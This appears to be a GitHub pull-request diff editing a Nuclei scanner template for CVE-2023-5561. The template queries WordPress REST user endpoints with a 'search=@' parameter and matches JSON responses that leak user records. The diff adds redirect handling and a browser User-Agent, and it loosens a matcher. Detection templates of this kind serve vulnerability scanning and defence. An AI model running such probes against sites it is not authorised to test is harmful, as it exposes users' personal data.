Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 8 additions & 4 deletions http/cves/2023/CVE-2023-5561.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -40,6 +40,7 @@ http:
GET / HTTP/1.1
Host: {{Hostname}}

redirects: true
matchers:
- type: dsl
dsl:
Expand All @@ -50,18 +51,21 @@ http:
path:
- "{{BaseURL}}/{{route}}search=@"

stop-at-first-match: true
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

attack: clusterbomb
payloads:
route:
- "wp-json/wp/v2/users?"
- "?rest_route=/wp/v2/users&"
attack: clusterbomb

stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "[{\"id", "name\":", "@")'
- 'contains_all(body, "[{\"id", "name\":")'
condition: and
# digest: 4b0a00483046022100925cdafa52890465362ddbe743a73ae30bb25f284a4c581867e0b50a1f674dcf022100a77201308db43b02266252fc853c6f288c5d83b0c63a6387677ce4aa673237b0:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100925cdafa52890465362ddbe743a73ae30bb25f284a4c581867e0b50a1f674dcf022100a77201308db43b02266252fc853c6f288c5d83b0c63a6387677ce4aa673237b0:922c64590222798bb761d5b6d8e72950
Loading